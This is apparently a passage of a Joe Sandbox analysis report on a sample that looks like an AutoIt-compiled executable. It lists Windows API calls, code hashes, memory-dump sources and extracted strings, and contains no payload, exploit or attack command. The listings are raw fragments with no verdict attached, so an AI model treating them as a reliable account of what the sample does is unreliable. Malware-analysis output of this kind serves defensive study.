                            • Instruction ID: dc695bcb28cc5c04e83978763c7e8f21c305d7e49bece0bf8d1014442716ddd4
                            • Opcode Fuzzy Hash: 42632bcb87890228c06bda3adaa928e43fff0270ad90eb6ec8ac48199e7202ee
                            • Instruction Fuzzy Hash: 6741367560030AEFDB119FA5DC89EAABBBAEB89721F144069F945D7260C7709D01CB30
                            APIs
                            • __wsplitpath.LIBCMT ref: 00DADA10
                            • _wcscat.LIBCMT ref: 00DADA28
                            • _wcscat.LIBCMT ref: 00DADA3A
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DADA4F
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DADA63
                            • GetFileAttributesW.KERNEL32(?), ref: 00DADA7B
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00DADA95
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DADAA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                            • String ID: *.*
                            • API String ID: 34673085-438819550
                            • Opcode ID: bfee80a80c893979d5ad8310deec1d20200b889058b3c45e98e8d12cab7ee4f5
                            • Instruction ID: 33d1f8aedc0d9765b4de04d45e66114aa36eab29c3b29183004c7258c5ac91f4
                            • Opcode Fuzzy Hash: bfee80a80c893979d5ad8310deec1d20200b889058b3c45e98e8d12cab7ee4f5
                            • Instruction Fuzzy Hash: 80816E715043419FCB64DF64C844AABB7EAEF8A710F18882AF88AC7651E634D945CF72
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • PostMessageW.USER32 ref: 00DCC1FC
                            • GetFocus.USER32(?,?,?,?), ref: 00DCC20C
                            • GetDlgCtrlID.USER32 ref: 00DCC217
                            • _memset.LIBCMT ref: 00DCC342
                            • GetMenuItemInfoW.USER32 ref: 00DCC36D
                            • GetMenuItemCount.USER32(?), ref: 00DCC38D
                            • GetMenuItemID.USER32(?,00000000), ref: 00DCC3A0
                            • GetMenuItemInfoW.USER32 ref: 00DCC3D4
                            • GetMenuItemInfoW.USER32 ref: 00DCC41C
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DCC454
                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00DCC489
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                            • String ID: 0
                            APIs
                            • GetDC.USER32(00000000), ref: 00DB738F
                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00DB739B
                            • CreateCompatibleDC.GDI32(?), ref: 00DB73A7
                            • SelectObject.GDI32(00000000,?), ref: 00DB73B4
                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00DB7408
                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00DB7444
                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00DB7468
                            • SelectObject.GDI32(00000006,?), ref: 00DB7470
                            • DeleteObject.GDI32(?), ref: 00DB7479
                            • DeleteDC.GDI32(00000006), ref: 00DB7480
                            • ReleaseDC.USER32(00000000,?), ref: 00DB748B
                            Similarity
                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                            • String ID: (
                            APIs
                              • Part of subcall function 00D60957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00D46B0C,?,00008000), ref: 00D60973
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00D46BAD
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D46CFA
                              • Part of subcall function 00D4586D: _wcscpy.LIBCMT ref: 00D458A5
                              • Part of subcall function 00D6363D: _iswctype.LIBCMT ref: 00D63645
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                            APIs
                            Similarity
                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                            • String ID:
                            APIs
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • _memset.LIBCMT ref: 00D9786B
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D978A0
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D978BC
                            • RegOpenKeyExW.ADVAPI32 ref: 00D978D8
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00D97902
                            • CLSIDFromString.OLE32(?,?), ref: 00D9792A
                            • RegCloseKey.ADVAPI32(?), ref: 00D97935
                            • RegCloseKey.ADVAPI32(?), ref: 00D9793A
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00DC0E31
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D7E2A0,00000010,?,Bad directive syntax error,00DCF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00D9F7C2
                            • LoadStringW.USER32(00000000,?,00D7E2A0,00000010), ref: 00D9F7C9
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                            • _wprintf.LIBCMT ref: 00D9F7FC
                            • __swprintf.LIBCMT ref: 00D9F81E
                            • MessageBoxW.USER32 ref: 00D9F88D
                            Similarity
                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                            APIs
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                              • Part of subcall function 00D47924: _memmove.LIBCMT ref: 00D479AD
                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DA5330
                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DA5346
                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DA5357
                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DA5369
                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DA537A
                            Similarity
                            • API ID: SendString$_memmove
                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                            APIs
                            Similarity
                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                            • String ID: 0.0.0.0
                            APIs
                            • GetSysColorBrush.USER32 ref: 00D43074
                            • RegisterClassExW.USER32(00000030), ref: 00D4309E
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
                            • InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
                            • LoadIconW.USER32 ref: 00D430F2
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            APIs
                            • timeGetTime.WINMM ref: 00DA4F7A
                              • Part of subcall function 00D6049F: timeGetTime.WINMM ref: 00D604A3
                            • Sleep.KERNEL32(0000000A), ref: 00DA4FA6
                            • EnumThreadWindows.USER32 ref: 00DA4FCA
                            • FindWindowExW.USER32 ref: 00DA4FEC
                            • SetActiveWindow.USER32 ref: 00DA500B
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DA5019
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DA5038
                            • Sleep.KERNEL32(000000FA), ref: 00DA5043
                            • IsWindow.USER32 ref: 00DA504F
                            • EndDialog.USER32 ref: 00DA5060
                            Similarity
                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                            • String ID: BUTTON
                            APIs
                            • GetSysColorBrush.USER32 ref: 00D43074
                            • RegisterClassExW.USER32(00000030), ref: 00D4309E
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D430AF
                            • InitCommonControlsEx.COMCTL32(?), ref: 00D430CC
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D430DC
                            • LoadIconW.USER32 ref: 00D430F2
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43101
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • CoInitialize.OLE32(00000000), ref: 00DAD5EA
                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DAD67D
                            • SHGetDesktopFolder.SHELL32(?), ref: 00DAD691
                            • CoCreateInstance.OLE32(00DD2D7C,00000000,00000001,00DF8C1C,?), ref: 00DAD6DD
                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DAD74C
                            • CoTaskMemFree.OLE32(?), ref: 00DAD7A4
                            • _memset.LIBCMT ref: 00DAD7E1
                            • SHBrowseForFolderW.SHELL32(?), ref: 00DAD81D
                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DAD840
                            • CoTaskMemFree.OLE32(00000000), ref: 00DAD847
                            • CoTaskMemFree.OLE32(00000000), ref: 00DAD87E
                            • CoUninitialize.OLE32 ref: 00DAD880
                            Similarity
                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                            • String ID:
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 00D9C283
                            • GetWindowRect.USER32(00000000,?), ref: 00D9C295
                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D9C2F3
                            • GetDlgItem.USER32(?,00000002), ref: 00D9C2FE
                            • GetWindowRect.USER32(00000000,?), ref: 00D9C310
                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D9C364
                            • GetDlgItem.USER32(?,000003E9), ref: 00D9C372
                            • GetWindowRect.USER32(00000000,?), ref: 00D9C383
                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D9C3C6
                            • GetDlgItem.USER32(?,000003EA), ref: 00D9C3D4
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D9C3F1
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D9C3FE
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            APIs
                              • Part of subcall function 00D41B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00D41B9A
                            • DestroyWindow.USER32 ref: 00D420D3
                            • KillTimer.USER32 ref: 00D4216E
                            • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BCA6
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BCD7
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BCEE
                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D416CB,00000000,?,?,00D41AE2,?,?), ref: 00D7BD0A
                            • DeleteObject.GDI32(00000000), ref: 00D7BD1C
                            Similarity
                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                            • String ID:
                            • API String ID: 641708696-0
                            APIs
                              • Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC
                            • GetSysColor.USER32(0000000F,?,?,?,?), ref: 00D421D3
                            Similarity
                            • API ID: ColorLongWindow
                            • String ID:
                            • API String ID: 259745315-0
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 00DAA90B
                            • GetDriveTypeW.KERNEL32(00000061,00DF89A0,00000061), ref: 00DAA9D5
                            • _wcscpy.LIBCMT ref: 00DAA9FF
                            Similarity
                            • API ID: BuffCharDriveLowerType_wcscpy
                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                            • API String ID: 2820617543-1000479233
                            APIs
                            Similarity
                            • API ID: __i64tow__itow__swprintf
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 421087845-2263619337
                            APIs
                            Similarity
                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                            • String ID: 0$F
                            • API String ID: 176399719-3044882817
                            APIs
                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 00DC755E
                            • CreateCompatibleDC.GDI32(00000000), ref: 00DC7565
                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DC7578
                            • SelectObject.GDI32(00000000,00000000), ref: 00DC7580
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DC758B
                            • DeleteDC.GDI32(00000000), ref: 00DC7594
                            • GetWindowLongW.USER32(?,000000EC), ref: 00DC759E
                            • SetLayeredWindowAttributes.USER32 ref: 00DC75B2
                            • DestroyWindow.USER32 ref: 00DC75BE
                            Similarity
                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                            • String ID: static
                            • API String ID: 2559357485-2160076837
                            APIs
                            • _memset.LIBCMT ref: 00D66E3E
                              • Part of subcall function 00D68B28: __getptd_noexit.LIBCMT ref: 00D68B28
                            • __gmtime64_s.LIBCMT ref: 00D66ED7
                            • __gmtime64_s.LIBCMT ref: 00D66F0D
                            • __gmtime64_s.LIBCMT ref: 00D66F2A
                            • __allrem.LIBCMT ref: 00D66F80
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D66F9C
                            • __allrem.LIBCMT ref: 00D66FB3
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D66FD1
                            • __allrem.LIBCMT ref: 00D66FE8
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D67006
                            • __invoke_watson.LIBCMT ref: 00D67077
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                            • String ID:
                            • API String ID: 384356119-0
                            APIs
                            • _memset.LIBCMT ref: 00DA2542
                            • GetMenuItemInfoW.USER32 ref: 00DA25A3
                            • SetMenuItemInfoW.USER32 ref: 00DA25D9
                            • Sleep.KERNEL32(000001F4), ref: 00DA25EB
                            • GetMenuItemCount.USER32(?), ref: 00DA262F
                            • GetMenuItemID.USER32(?,00000000), ref: 00DA264B
                            • GetMenuItemID.USER32(?,-00000001), ref: 00DA2675
                            • GetMenuItemID.USER32(?,?), ref: 00DA26BA
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DA2700
                            • GetMenuItemInfoW.USER32 ref: 00DA2714
                            • SetMenuItemInfoW.USER32 ref: 00DA2735
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                            • String ID:
                            • API String ID: 4176008265-0
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DC6FA5
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DC6FA8
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DC6FCC
                            • _memset.LIBCMT ref: 00DC6FDD
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DC6FEF
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DC7067
                            Similarity
                            • API ID: MessageSend$LongWindow_memset
                            • String ID:
                            • API String ID: 830647256-0
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D96BBF
                            • SafeArrayAllocData.OLEAUT32(?), ref: 00D96C18
                            • VariantInit.OLEAUT32(?), ref: 00D96C2A
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D96C4A
                            • VariantCopy.OLEAUT32(?,?), ref: 00D96C9D
                            • SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00D96950), ref: 00D96CB1
                            • VariantClear.OLEAUT32(?), ref: 00D96CC6
                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00D96CD3
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D96CDC
                            • VariantClear.OLEAUT32(?), ref: 00D96CEE
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D96CF9
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • CoInitialize.OLE32 ref: 00DB8403
                            • CoUninitialize.OLE32 ref: 00DB840E
                            • CoCreateInstance.OLE32(?,00000000,00000017,00DD2BEC,?), ref: 00DB846E
                            • IIDFromString.OLE32(?,?), ref: 00DB84E1
                            • VariantInit.OLEAUT32(?), ref: 00DB857B
                            • VariantClear.OLEAUT32(?), ref: 00DB85DC
                            Similarity
                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 834269672-1287834457
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 00DB5793
                            • inet_addr.WSOCK32(?,?,?), ref: 00DB57D8
                            • gethostbyname.WSOCK32(?), ref: 00DB57E4
                            • IcmpCreateFile.IPHLPAPI ref: 00DB57F2
                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB5862
                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB5878
                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00DB58ED
                            • WSACleanup.WSOCK32 ref: 00DB58F3
                            Similarity
                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                            • String ID: Ping
                            • API String ID: 1028309954-2246546115
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 00DAB4D0
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DAB546
                            • GetLastError.KERNEL32 ref: 00DAB550
                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00DAB5BD
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D99014
                            • GetDlgCtrlID.USER32 ref: 00D9901F
                            • GetParent.USER32 ref: 00D9903B
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D9903E
                            • GetDlgCtrlID.USER32 ref: 00D99047
                            • GetParent.USER32(?), ref: 00D99063
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D99066
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: dfa92c821650bcc5f5d97f8b175b7545549cfed2eb021320f85dbda76d251ef0
                            • Instruction ID: 90eaaf05c70554f1c1c848aa9d266601ce2b596c99bc37bbd39589f4d1928b2e
                            • Opcode Fuzzy Hash: dfa92c821650bcc5f5d97f8b175b7545549cfed2eb021320f85dbda76d251ef0
                            • Instruction Fuzzy Hash: 9121D074A00209BFDF04ABA4CC95EFEBB75EF49310F104219F961972A2DB759819DB30
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00D990FD
                            • GetDlgCtrlID.USER32 ref: 00D99108
                            • GetParent.USER32 ref: 00D99124
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D99127
                            • GetDlgCtrlID.USER32 ref: 00D99130
                            • GetParent.USER32(?), ref: 00D9914C
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D9914F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: 0ac2df70ed4132e509f0ccfd4ee814444b84e6ba488c505d7ab13c7f644a3008
                            • Instruction ID: 2dbb6fd9faae6114fa3a92a67bf9adbdcef00e4165efe044630a573e28656d77
                            • Opcode Fuzzy Hash: 0ac2df70ed4132e509f0ccfd4ee814444b84e6ba488c505d7ab13c7f644a3008
                            • Instruction Fuzzy Hash: E221F574A4020ABBDF00ABA4CC85EFEBB75EF48300F004119F955973A2DB758819DB30
                            APIs
                            • GetParent.USER32 ref: 00D9916F
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00D99184
                            • _wcscmp.LIBCMT ref: 00D99196
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D99211
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassMessageNameParentSend_wcscmp
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 1704125052-3381328864
                            • Opcode ID: c27a42b2f62366a68f4a56a74dae99797e8a6a8f545532157fec70bfc2fc5e81
                            • Instruction ID: a8e79ebfb7942907b067a3009e4bc0a9623d69b8e6b8af41c9fa93a529ea365d
                            • Opcode Fuzzy Hash: c27a42b2f62366a68f4a56a74dae99797e8a6a8f545532157fec70bfc2fc5e81
                            • Instruction Fuzzy Hash: 5011EC7A688307BAFF212728DC16DF7B79CDB15720B20412AFA00E54D2FEA298555A74
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00DB88D7
                            • CoInitialize.OLE32(00000000), ref: 00DB8904
                            • CoUninitialize.OLE32 ref: 00DB890E
                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00DB8A0E
                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DB8B3B
                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00DD2C0C), ref: 00DB8B6F
                            • CoGetObject.OLE32(?,00000000,00DD2C0C,?), ref: 00DB8B92
                            • SetErrorMode.KERNEL32(00000000), ref: 00DB8BA5
                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DB8C25
                            • VariantClear.OLEAUT32(?), ref: 00DB8C35
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                            • String ID:
                            • API String ID: 2395222682-0
                            • Opcode ID: f399f577bd07b00deb859b79d753d38b7bafe8fd20327d4f83585a8415739584
                            • Instruction ID: b8ec0c0e0cb41dc92632c9bd3b632321b16d2b33bcf7975cfd703f1eb615bafa
                            • Opcode Fuzzy Hash: f399f577bd07b00deb859b79d753d38b7bafe8fd20327d4f83585a8415739584
                            • Instruction Fuzzy Hash: 8FC1F2B1608305EFC700DF68C88496ABBE9EF89748F04495DF98A9B251DB71ED05CB62
                            APIs
                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00DA7A6C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ArraySafeVartype
                            • String ID:
                            • API String ID: 1725837607-0
                            • Opcode ID: 1af7e4db83df48e26833af9f4618158f950fd1e245515c9e460bc1175e91c757
                            • Instruction ID: 81634d339c66016d831483a5ad28fc9f0b82cf862e6fa220cf9151e297fc2f0a
                            • Opcode Fuzzy Hash: 1af7e4db83df48e26833af9f4618158f950fd1e245515c9e460bc1175e91c757
                            • Instruction Fuzzy Hash: 53B16B72A0821A9FDB00DFA5C885BBEB7B5FF0A321F244429E941E7251D734E941CBB1
                            APIs
                            • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00DA0268,?,00000001), ref: 00DA11F0
                            • GetForegroundWindow.USER32 ref: 00DA1204
                            • GetWindowThreadProcessId.USER32(00000000), ref: 00DA120B
